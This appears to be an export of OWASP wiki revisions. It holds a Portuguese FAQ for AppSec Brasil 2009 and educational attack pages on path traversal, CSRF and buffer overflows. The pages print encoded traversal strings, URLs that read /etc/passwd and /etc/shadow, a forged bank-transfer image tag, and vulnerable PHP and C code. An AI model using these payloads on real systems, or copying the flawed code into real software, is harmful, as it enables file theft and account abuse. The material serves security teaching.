'''Comitês'''&lt;br /&gt;
&lt;br /&gt;
OWASP Conferences Chair: Dave Wichers - Aspect Security - dave.wichers 'at' owasp.org&lt;br /&gt;
&lt;br /&gt;
2009 AppSec Brasil - Comitê de Programa (appsec.brasil@camara.gov.br):&lt;br /&gt;
* Coordenador Geral: Lucas C. Ferreira (lucas.ferreira at owasp.org)&lt;br /&gt;
* Coordenador de Tutoriais: Eduardo V. C. Neves (eduardo.neves at owasp.org)&lt;br /&gt;
* Coordenador do Programa: Wagner Elias (wagner.elias at owasp.org)&lt;br /&gt;
&lt;br /&gt;
Equipe Organizadora&lt;br /&gt;
&lt;br /&gt;
* Cassio Goldschmidt (cassio 'at' owasp.org)&lt;br /&gt;
* Kuai Hinojosa (kuai.hinojosa 'at' owasp.org)&lt;br /&gt;
* Leonardo Cavallari - (leo.cavallari 'at' owasp.org)&lt;br /&gt;
* Thiago Lechuga (thiagoalz 'at' gmail.com)&lt;br /&gt;
* Dinis Cruz (dinis.cruz 'at' owasp.org)&lt;br /&gt;
&lt;br /&gt;
====Links ====&lt;br /&gt;
&lt;br /&gt;
Página do evento no LinkedIn: http://events.linkedin.com/OWASP-AppSec-Brasil/pub/65160&lt;br /&gt;
&lt;br /&gt;
====Perguntas Frequentes====&lt;br /&gt;
&lt;br /&gt;
'''Quem está promovendo a conferência?'''&lt;br /&gt;
&lt;br /&gt;
Esta conferência é promovida e organizada pela [http://www.ticontrole.gov.br Comunidade TI-Controle] e a [http://www.camara.gov.br Câmara dos Deputados], sendo os conteúdos (apresentações, palestras, cursos, etc) selecionados pelo [[Brazilian| Capítulo Brasil da OWASP]].&lt;br /&gt;
&lt;br /&gt;
'''Quanto irá custar?'''&lt;br /&gt;
&lt;br /&gt;
Nada. Graças ao seu patrocinador, a participação da conferência será gratuita. No entanto, devido ao número limitados de participantes, recomenda-se registrar antecipadamente.&lt;br /&gt;
&lt;br /&gt;
'''''Chamada de Trabalhos'''''&lt;br /&gt;
&lt;br /&gt;
'''O que é a OWASP (Open Web Application Security Project)?'''&lt;br /&gt;
&lt;br /&gt;
A OWASP (Projeto Aberto de Segurança de Aplicações Web, em português) é uma comunidade mundial aberta e livre focada em melhorar a segurança de aplicações. Nossa missão é tornar a segurança de aplicações visível, para que pessoas e organizações possam tomar decisões informadas sobre os reais riscos da segurança de aplicações. Todo mundo é livre para participar na OWASP e todo nosso material é disponível sob um licença de software livre e aberta. A Fundação OWASP é uma organização sem fins lucrativos que garante a constante disponibilidade e suporte para nosso trabalho com seu suporte.&lt;br /&gt;
&lt;br /&gt;
'''Quantas sessões haverão?'''&lt;br /&gt;
&lt;br /&gt;
Veja a agenda na [http://www.owasp.org/index.php/AppSec_Brasil_2009 página principal] da conferência.&lt;br /&gt;
&lt;br /&gt;
'''Quais são os prazos para submissão?'''&lt;br /&gt;
&lt;br /&gt;
O prazo para submissão é 11 de Julho, sendo que a versão final dos trabalhos selecionados deve ser enviado até 15 de setembro de 2009.  &lt;br /&gt;
&lt;br /&gt;
'''Quem poderá submeter trabalhos?'''&lt;br /&gt;
&lt;br /&gt;
Autores principais podem submeter seus trabalhos para avaliação. Representantes de terceiros, como empresas de relações públicas ou representantes de palestrantes, NÃO DEVEM submeter trabalhos em nome de um potencial palestrante.&lt;br /&gt;
&lt;br /&gt;
'''Por que submissões de trabalhos por Representantes, como empresas de RP, não são permitidos?'''&lt;br /&gt;
&lt;br /&gt;
Devido aos direitos autorais e responsabilidade com problemas de propriedade intelectual, bem como a necessidade da OWASP ter contato direto com os potenciais apresentadores para fornecer detalhes e providenciar os materiais, nós requeremos que apenas os autores principais submetam suas apresentações. Representantes de terceiros, como empresas de relações públicas ou representantes de palestrantes, NÃO DEVEM submeter trabalhos em nome de um potencial palestrante.&lt;br /&gt;
&lt;br /&gt;
'''Existe alguma restrição no conteúdo das apresentações?'''&lt;br /&gt;
&lt;br /&gt;
Sim, todas as apresentações devem respeitar as regras definidas no [[Speaker Agreement |Acordo de Palestrantes da OWASP]]. Basicamente, as apresentações não devem possuir qualquer conteúdo promocional ou faça referência a marcas e produtos.&lt;br /&gt;
&lt;br /&gt;
'''Quanto tempo eu terei que esperar antes de ser notificado se meu trabalho foi aceito ou negado?'''&lt;br /&gt;
&lt;br /&gt;
Os autores serão notificados do resultado (aceito ou negado) em 7 de Agosto de 2009. &lt;br /&gt;
&lt;br /&gt;
'''Existe algum honorário para os palestrantes?'''&lt;br /&gt;
&lt;br /&gt;
Não. A OWASP é comprometida em tornar sua conferência para a maior audiência possível. Neste sentido, a OWASP manterá a entrada gratuita para a AppSec Brasil 2009 de forma a tornar a conferência acessível. Por conta disto, nós não somos capazes de oferecer gratificações mas recebemos nossos palestrantes como convidados para a conferência onde eles poderão interagir com outros profissionais de segurança. Nós iremos oferecer hospedagem e passagem aérea para um apresentador de cada tarabalho selecionado.&lt;br /&gt;
&lt;br /&gt;
'''Eu fui aceito. Quais são os materiais que eu preciso depositar e quais são os prazos?'''&lt;br /&gt;
&lt;br /&gt;
A lista a seguir apresenta os materiais que são requeridos para cada apresentação aceita. O não cumprimento na submissão desses materiais no prazo previamente determinado acarretará no cancelamento da aprovação do trabalho.&lt;br /&gt;
* [[Speaker_Agreement | Acordo de Palestrante]] (15 de Julho de 2009)&lt;br /&gt;
* Apresentação no formato PowerPoint conforme http://www.owasp.org/images/5/54/Presentation_template.ppt OWASP Template] (15 de Setembro de 2009)&lt;br /&gt;
* Bibliografia detalhada de recursos, co-autores, etc (15 de Setembro de 2009)&lt;br /&gt;
* Opcional: Artigo para inclusão no CD da conferência (15 de Setembro de 2009)&lt;br /&gt;
&lt;br /&gt;
'''Eu preciso submeter um artigo?'''&lt;br /&gt;
&lt;br /&gt;
Não.  Nós certamente apreciamos todo artigo que possa ser incluído no website e CD da conferência, mas isto não é orbigatório. Se você tem um artigo escrito para acompanhar sua apresentação, por favor envie-nos junto com sua submissão. Submissões com artigos anexados recebrão considerações adicionais.&lt;br /&gt;
    &lt;br /&gt;
'''O que acontece caso eu tenha um co-autor que não está apresentando. Como eu referencio esta pessoa??'''&lt;br /&gt;
&lt;br /&gt;
Todos os co-autores e trabalhos utilizados devem ser citados na bibliografia detalhada que será publicada no CD da conferência.&lt;br /&gt;
&lt;br /&gt;
'''Eu fui aceito e gostaria de adicionar um co-apresentador. Eu ainda posso fazer isso?'''&lt;br /&gt;
&lt;br /&gt;
Não. Co-apresentadores devem ser adicionados no momento em que a apresentação for submetida. Eles podem participar da conferência e apresentar, caso se registrem como qualquer outro participante.&lt;br /&gt;
&lt;br /&gt;
'''Minha empresa de RP/amigos/família/amigos de trabalho gostariam de prestigiar minha apresentação. A presença deles será permitida gratuitamente??'''&lt;br /&gt;
&lt;br /&gt;
Sim, mas eles precisam se registrar pelo site como todo outro participante.&lt;br /&gt;
&lt;br /&gt;
'''Eu tenho outras dúvidas...'''&lt;br /&gt;
&lt;br /&gt;
Envie um e-mail para appsec.brasil@camara.gov.br a respeito deste evento.&lt;br /&gt;
&lt;br /&gt;
__NOTOC__&lt;br /&gt;
&amp;lt;headertabs/&amp;gt;&lt;br /&gt;
[[Category:OWASP AppSec Conference]]&lt;/div&gt;</summary>
		<author><name>Thiagoalz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Path_Traversal&amp;diff=31587</id>
		<title>Path Traversal</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Path_Traversal&amp;diff=31587"/>
				<updated>2008-06-15T20:58:09Z</updated>
		
		<summary type="html">&lt;p&gt;Thiagoalz: adjustments to new template and Merging Absolute path Transversal.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
This attack aims to access files and directories that are stored outside web root folder. By browsing the application, one should look for absolute links to files stored on the web server and how this is done. By manipulating variables that reference files with “dot-dot-slash (../)” sequences and its variations it’s possible to access arbitrary files and directories stored on file system, including application source code, configuration and critical system files, limited by system operational access control. &lt;br /&gt;
The idea is to use “../” sequences to move up to root directory, thus permitting to navigate thru file system. &lt;br /&gt;
&lt;br /&gt;
This attack can be execute with a external malicious code injected on the path, the way of the [[Resource Injection]] attack, but it’s a Path Traversal attack&lt;br /&gt;
&lt;br /&gt;
This attack is also named of “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.&lt;br /&gt;
&lt;br /&gt;
To perform this attack it’s not necessary to use a specific tool, but it’s recommended to use a spider/crawler to detect all URLs available.&lt;br /&gt;
&lt;br /&gt;
'''Request variations'''&lt;br /&gt;
&lt;br /&gt;
Encoding and double encoding:&lt;br /&gt;
&lt;br /&gt;
 %2e%2e%2f represents ../&lt;br /&gt;
 %2e%2e/ represents ../&lt;br /&gt;
 ..%2f represents ../ &lt;br /&gt;
 %2e%2e%5c represents ..\&lt;br /&gt;
 %2e%2e\ represents ..\ &lt;br /&gt;
 ..%5c represents ..\ &lt;br /&gt;
 %252e%252e%255c represents ..\ &lt;br /&gt;
 ..%255c represents ..\ and so on. &lt;br /&gt;
&lt;br /&gt;
'''Unicode/UTF-8 Encoding (only for systems support UTF-8 sequences)'''&lt;br /&gt;
&lt;br /&gt;
 ..%c0%af represents ../ &lt;br /&gt;
 ..%c1%9c represents ..\ &lt;br /&gt;
&lt;br /&gt;
'''OS specific'''&lt;br /&gt;
&lt;br /&gt;
UNIX &lt;br /&gt;
 Root directory:  “ / “ &lt;br /&gt;
 Directory separator: “ / “&lt;br /&gt;
&lt;br /&gt;
WINDOWS&lt;br /&gt;
 Root directory: “  &amp;lt;partition letter&amp;gt; : \ “&lt;br /&gt;
 Directory separator: “ / “ or “ \ ” &lt;br /&gt;
&lt;br /&gt;
===Severity===&lt;br /&gt;
&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
===Likelihood of exploitation===&lt;br /&gt;
&lt;br /&gt;
High&lt;br /&gt;
&lt;br /&gt;
==Examples==&lt;br /&gt;
&lt;br /&gt;
===Example 1===&lt;br /&gt;
In order to identify the possibility to execute this attack, it’s needed to observe how the application deals with the resources in use. The following examples show some situations.&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; http://some_site.com.br/get-files.jsp?file=report.pdf  &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; http://some_site.com.br/get-page.php?home=aaa.html  &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; http://some_site.com.br/some-page.asp?page=index.html  &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In these examples it’s possible to insert a malicious string as the variable parameter to access files located outside the web publish directory. Ex:&lt;br /&gt;
  &amp;lt;nowiki&amp;gt; http://some_site.com.br/get-files?file=../../../../some dir/some file &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
Or &lt;br /&gt;
  &amp;lt;nowiki&amp;gt; http://some_site.com.br/../../../../some dir/some file &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The following URLs show examples of *NIX password file exploitation:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://some_site.com.br/../../../../etc/shadow  &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://some_site.com.br/get-files?file=/etc/passwd &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Note: In a windows system an attacker can navigate only in a partition that locates web root while in the Linux he can navigate in all disc.&lt;br /&gt;
&lt;br /&gt;
===Example 2===&lt;br /&gt;
It's also possible to include files, and scripts, located on external website, &lt;br /&gt;
 &amp;lt;nowiki&amp;gt; http://some_site.com.br/some-page?page=http://other-site.com.br/other-page.htm/malicius-code.php   &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Example 3===&lt;br /&gt;
These examples illustrate a case when an attacker make the server show the CGI source code;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt; http://vulnerable-page.org/cgi-bin/main.cgi?file=main.cgi   &amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Example 4===&lt;br /&gt;
This example was extracted from: Wikipedia - Directory Traversal &lt;br /&gt;
&lt;br /&gt;
A typical example of vulnerable application code is:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;lt;nowiki&amp;gt;&lt;br /&gt;
&amp;lt;?php&lt;br /&gt;
$template = 'blue.php';&lt;br /&gt;
if ( is_set( $_COOKIE['TEMPLATE'] ) )&lt;br /&gt;
   $template = $_COOKIE['TEMPLATE'];&lt;br /&gt;
include ( &amp;quot;/home/users/phpguru/templates/&amp;quot; . $template );&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
An attack against this system could be to send the following HTTP request:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
GET /vulnerable.php HTTP/1.0&lt;br /&gt;
Cookie: TEMPLATE=../../../../../../../../../etc/passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Generating a server response such as:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
HTTP/1.0 200 OK&lt;br /&gt;
Content-Type: text/html&lt;br /&gt;
Server: Apache&lt;br /&gt;
&lt;br /&gt;
root:fi3sED95ibqR6:0:1:System Operator:/:/bin/ksh &lt;br /&gt;
daemon:*:1:1::/tmp: &lt;br /&gt;
phpguru:f8fk3j1OIf31.:182:100:Developer:/home/users/phpguru/:/bin/csh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The repeated &amp;lt;tt&amp;gt;../&amp;lt;/tt&amp;gt; characters after /home/users/phpguru/templates/ has caused &lt;br /&gt;
[http://www.php.net/manual/en/function.include.php include()] to traverse to the root directory, and then include the UNIX password file [[passwd|/etc/passwd]]. &lt;br /&gt;
&lt;br /&gt;
UNIX etc/passwd is a common file used to demonstrate '''directory traversal''', as it is often used by crackers to try cracking the passwords.&lt;br /&gt;
&lt;br /&gt;
===Absolute Path Traversal===&lt;br /&gt;
&lt;br /&gt;
:The following URLs maybe are vulnerable to this attack:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://testsite.com/get.php?f=list&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://testsite.com/get.cgi?f=2&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://testsite.com/get.asp?f=test&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
:A simple way to execute this attack is like this:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://testsite.com/get.php?f=/var/www/html/get.php&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://testsite.com/get.cgi?f=/var/www/html/admin/get.inc&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://testsite.com/get.asp?f=/etc/passwd&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
:When the web server returns information about errors in a web application, it is much easier for the attacker to guess the correct locations (e.g. path to the file with a source code, which then may be displayed).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Threat Agents]]==&lt;br /&gt;
&lt;br /&gt;
* [[:Category: Information Disclosure]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Attacks]]==&lt;br /&gt;
&lt;br /&gt;
* [[Path Manipulation]]&lt;br /&gt;
* [[Relative Path Traversal]]&lt;br /&gt;
* [[Resource Injection]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Vulnerabilities]]==&lt;br /&gt;
&lt;br /&gt;
* [[:Category:Input Validation Vulnerability]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Controls]]==&lt;br /&gt;
&lt;br /&gt;
* [[:Category:Input Validation]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
&lt;br /&gt;
* http://cwe.mitre.org/data/definitions/22.html&lt;br /&gt;
* http://www.webappsec.org/projects/threat/classes/path_traversal.shtml&lt;br /&gt;
* http://cve.mitre.org/docs/plover/SECTION.9.6.html#PATH.TRAV&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Abuse of Functionality]]&lt;br /&gt;
[[Category:Path Traversal Attack]]&lt;br /&gt;
[[Category:Resource Manipulation]]&lt;/div&gt;</summary>
		<author><name>Thiagoalz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Cross-Site_Request_Forgery_(CSRF)&amp;diff=31586</id>
		<title>Cross-Site Request Forgery (CSRF)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Cross-Site_Request_Forgery_(CSRF)&amp;diff=31586"/>
				<updated>2008-06-15T20:10:45Z</updated>
		
		<summary type="html">&lt;p&gt;Thiagoalz: adjustments to new template&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
Cross-Site Request Forgery (CSRF) is an attack that tricks the victim into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired function on the victim's behalf, like change the victim's e-mail address, home address, or password, or purchase something. CSRF attacks generally target functions that cause a state change on the server but can also be used to access sensitive data.&lt;br /&gt;
&lt;br /&gt;
For most sites, browsers will automatically include with such requests any credentials associated with the site, such as the user's session cookie, basic auth credentials, IP address, Windows domain credentials, etc.  Therefore, if the user is currently authenticated to the site, the site will have no way to distinguish this from a legitimate user request.&lt;br /&gt;
&lt;br /&gt;
In this way, the attacker can make the victim perform actions that they didn't intend to, such as logout, purchase item, change account information, retrieve account information, or any other function provided by the vulnerable website.&lt;br /&gt;
&lt;br /&gt;
Sometimes, it is possible to store the CSRF attack on the vulnerable site itself. Such vulnerabilities are called Stored CSRF flaws. This can be accomplished by simply storing an IMG or IFRAME tag in a field that accepts HTML, or by a more complex cross-site scripting attack. If the attack can store a CSRF attack in the site, the severity of the attack is amplified. In particular, the likelihood is increased because the victim is more likely to view the page containing the attack than some random page on the Internet.  The likelihood is also increased because the victim is sure to be authenticated to the site already.&lt;br /&gt;
&lt;br /&gt;
Synonyms: CSRF attacks are also known by a number of other names, including XSRF, &amp;quot;Sea Surf&amp;quot;, Session Riding, Cross-Site Reference Forgery, Hostile Linking. Microsoft refers to this type of attack as a One-Click attack in their threat modeling process and many places in their online documentation.&lt;br /&gt;
&lt;br /&gt;
===Prevention measures that do '''NOT''' work===&lt;br /&gt;
&lt;br /&gt;
;Using a secret cookie&lt;br /&gt;
:Remember that all cookies, even the ''secret'' ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request.&lt;br /&gt;
&lt;br /&gt;
;Only accepting POST requests&lt;br /&gt;
:Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request. The two most common methods are through the use of phishing sites (sites which appear to look like another valid site) and through the use of XMLHTTPRequest in a Cross-Site Scripting attack.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Risk Factors==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Examples==&lt;br /&gt;
&lt;br /&gt;
===How does the attack work?===&lt;br /&gt;
&lt;br /&gt;
There are numerous ways in which an end-user can be tricked into loading information from or submitting information to a web application. In order to execute an attack, we must first understand how to generate a malicious request for our victim to execute. Let us consider the following example: Alice wishes to transfer $100 to Bob using bank.com. The request generated by Alice will look similar to the following:&lt;br /&gt;
&lt;br /&gt;
 POST &amp;lt;nowiki&amp;gt;http://bank.com/transfer.do&amp;lt;/nowiki&amp;gt; HTTP/1.1&lt;br /&gt;
 ...&lt;br /&gt;
 ...&lt;br /&gt;
 ...&lt;br /&gt;
 Content-Length: 19;&lt;br /&gt;
 &lt;br /&gt;
 acct=BOB&amp;amp;amount=100&lt;br /&gt;
&lt;br /&gt;
However, Maria notices that the same web application will execute the same transfer using URL parameters as follows:&lt;br /&gt;
&lt;br /&gt;
 GET &amp;lt;nowiki&amp;gt;http://bank.com/transfer.do?acct=BOB&amp;amp;amount=100&amp;lt;/nowiki&amp;gt; HTTP/1.1&lt;br /&gt;
&lt;br /&gt;
Maria now decides to exploit this web application vulnerability using Alice as her victim. Maria first constructs the following URL which will transfer $100,000 from Alice's account to her account:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;http://bank.com/transfer.do?acct=MARIA&amp;amp;amount=100000&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Now that her malicious request is generated, Maria must trick Alice into submitting the request. The most basic method is to send Alice an HTML email containing the following: &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;a href=&amp;quot;http://bank.com/transfer.do?acct=MARIA&amp;amp;amount=100000&amp;quot;&amp;gt;View my Pictures!&amp;lt;/a&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Assuming Alice is authenticated with the application when she clicks the link, the transfer of $100,000 to Maria's account will occur. However, Maria realizes that if Alice clicks the link, then Alice will notice that a transfer has occurred. Therefore, Maria decides to hide the attack in a zero-byte image:&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;nowiki&amp;gt;&amp;lt;img src=&amp;quot;http://bank.com/transfer.do?acct=MARIA&amp;amp;amount=100000&amp;quot; width=&amp;quot;1&amp;quot; height=&amp;quot;1&amp;quot; border=&amp;quot;0&amp;quot;&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If this image tag were included in the email, Alice would only see a little box indicating that the browser could not render the image. However, the browser ''will still'' submit the request to bank.com without any visual indication that the transfer has taken place.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Threat Agents]]==&lt;br /&gt;
&lt;br /&gt;
* [[:Category:Client-side Attacks]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Attacks]]==&lt;br /&gt;
&lt;br /&gt;
* [[XSS]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Vulnerabilities]]==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Related [[Controls]]==&lt;br /&gt;
&lt;br /&gt;
* Add a per-request nonce to URL and all forms in addition to the standard session. This is also referred to as &amp;quot;form keys&amp;quot;. Many frameworks (ex, Drupal.org 4.7.4+) either have or are starting to include this type of protection &amp;quot;built-in&amp;quot; to every form so the programmer does not need to code this protection manually. &lt;br /&gt;
* TBD: Add a per-session nonce to URL and all forms&lt;br /&gt;
* TBD: Add a hash(session id, function name, server-side secret) to URL and all forms&lt;br /&gt;
* TBD: .NET - add session identifier to ViewState with MAC&lt;br /&gt;
* Checking HTTP referrer details can help mitigate the attack but does certainly not provide a bullet proof solution. By ensuring the HTTP posts have come from the original site means that the attacks from other sites will not function. However, if the CSRF attack was used in combination with XSS on the original site then this mechanism will not provide any protection.&lt;br /&gt;
* &amp;quot;Although cross-site request forgery is fundamentally a problem with the web application, not the user, users can help protect their accounts at poorly designed sites by logging off the site before visiting another, or clearing their browser's cookies at the end of each browser session.&amp;quot; -http://en.wikipedia.org/wiki/Cross-site_request_forgery#_note-1&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==References==&lt;br /&gt;
* [http://www.cgisecurity.com/articles/csrf-faq.shtml The Cross-Site Request Forgery (CSRF/XSRF) FAQ]&lt;br /&gt;
: ''quote: &amp;quot;This paper serves as a living document for Cross-Site Request Forgery issues. This document will serve as a repository of information from existing papers, talks, and mailing list postings and will be updated as new information is discovered.&amp;quot;''&lt;br /&gt;
&lt;br /&gt;
* [[Testing for CSRF]]&lt;br /&gt;
: CSRF (aka Session riding) paper from the OWASP Testing Guide project (need to integrate)&lt;br /&gt;
&lt;br /&gt;
* [http://www.darkreading.com/document.asp?doc_id=107651&amp;amp;WT.svl=news1_2 CSRF Vulnerability: A 'Sleeping Giant']&lt;br /&gt;
: Overview Paper&lt;br /&gt;
&lt;br /&gt;
* [http://www.owasp.org/index.php/Image:OWASPAppSecEU2006_RequestRodeo.ppt RequestRodeo: Client Side Protection against Session Riding]&lt;br /&gt;
: Martin Johns and Justus Winter's interesting paper and presentation for the 4th OWASP AppSec Conference which described potential techniques that browsers could adopt to automatically provide CSRF protection - [http://www.owasp.org/index.php/Image:RequestRodeo-MartinJohns.pdf PDF paper]&lt;br /&gt;
&lt;br /&gt;
* [http://www.owasp.org/index.php/CSRF_Guard CSRF Guard]&lt;br /&gt;
: A J2EE Filter which appends a unique request token to each form and link in the HTML response&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Exploitation of Authentication]]&lt;br /&gt;
[[Category:Embedded Malicious Code]]&lt;br /&gt;
[[Category:Spoofing]]&lt;/div&gt;</summary>
		<author><name>Thiagoalz</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Buffer_overflow_attack&amp;diff=31581</id>
		<title>Buffer overflow attack</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Buffer_overflow_attack&amp;diff=31581"/>
				<updated>2008-06-15T19:57:44Z</updated>
		
		<summary type="html">&lt;p&gt;Thiagoalz: adjustments to new template&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;{{Template:Attack}}&lt;br /&gt;
&lt;br /&gt;
Last revision (mm/dd/yy): '''{{REVISIONMONTH}}/{{REVISIONDAY}}/{{REVISIONYEAR}}'''&lt;br /&gt;
&lt;br /&gt;
==Description==&lt;br /&gt;
&lt;br /&gt;
Buffer overflow errors are characterized by the overwriting these memory&lt;br /&gt;
fragments of the proccess, which should have never been modified&lt;br /&gt;
intentionally or unintentionally.&lt;br /&gt;
Overwriting values of the IP (Instruction Pointer), BP (Base Pointer)&lt;br /&gt;
and other registers causes exceptions, segmentation faults and other&lt;br /&gt;
errors to occur. Usually these errors ends execution of the application&lt;br /&gt;
in an unexpected way.&lt;br /&gt;
Buffer overflow errors occurs when we operate on buffers of char type.&lt;br /&gt;
&lt;br /&gt;
BO (common name for this kind of errors) is simply a stack or heap overflow.&lt;br /&gt;
We don't distinguish beetwen these two in this article to avoid reader's confusion.&lt;br /&gt;
Details about using stack and heap overflow techniques reader will find in&lt;br /&gt;
the separate articles.&lt;br /&gt;
&lt;br /&gt;
Below examples are written in C language under GNU/Linux system on x86 architecture.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Risk Factors==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Examples ==&lt;br /&gt;
&lt;br /&gt;
===Example 1===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
  int main(int argc, char **argv)&lt;br /&gt;
  {&lt;br /&gt;
  char buf[8]; // buffer for eight characters&lt;br /&gt;
  gets(buf); // read from stdio (sensitive function!)&lt;br /&gt;
  printf(&amp;quot;%s\n&amp;quot;, buf); // print out data stored in buf&lt;br /&gt;
  return 0; // 0 as return value&lt;br /&gt;
  }&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
This very simple application reads from the standard input an array of the&lt;br /&gt;
characters and copies it into the buffer of the char type. The size of this&lt;br /&gt;
buffer is eight characters. After that the content of the buffer is displayed&lt;br /&gt;
and application exits.&lt;br /&gt;
&lt;br /&gt;
Program compilation:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  rezos@spin ~/inzynieria $ gcc bo-simple.c -o bo-simple&lt;br /&gt;
  /tmp/ccECXQAX.o: In function `main':&lt;br /&gt;
  bo-simple.c:(.text+0x17): warning: the `gets' function is dangerous and&lt;br /&gt;
  should not be used.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
At this stage even compiler suggests us that the used function gets() doesn't belong&lt;br /&gt;
to the safe ones.&lt;br /&gt;
&lt;br /&gt;
Usage example:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
  rezos@spin ~/inzynieria $ ./bo-simple // program start&lt;br /&gt;
  1234 // we eneter &amp;quot;1234&amp;quot; string from the keyboard&lt;br /&gt;
  1234 // program prints out the conent of the buffer&lt;br /&gt;
  rezos@spin ~/inzynieria $ ./bo-simple // start&lt;br /&gt;
  123456789012 // we eneter &amp;quot;123456789012&amp;quot;&lt;br /&gt;
  123456789012 // content of the buffer &amp;quot;buf&amp;quot; ?!?!&lt;br /&gt;
  Segmentation fault // information about memory segmenatation fault&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Definitely we manage (un)luckily to execute faulty operation by&lt;br /&gt;
the program and provoke it to exit abnormally.&lt;br /&gt;
&lt;br /&gt;
Problem analysis:&lt;br /&gt;
&lt;br /&gt;
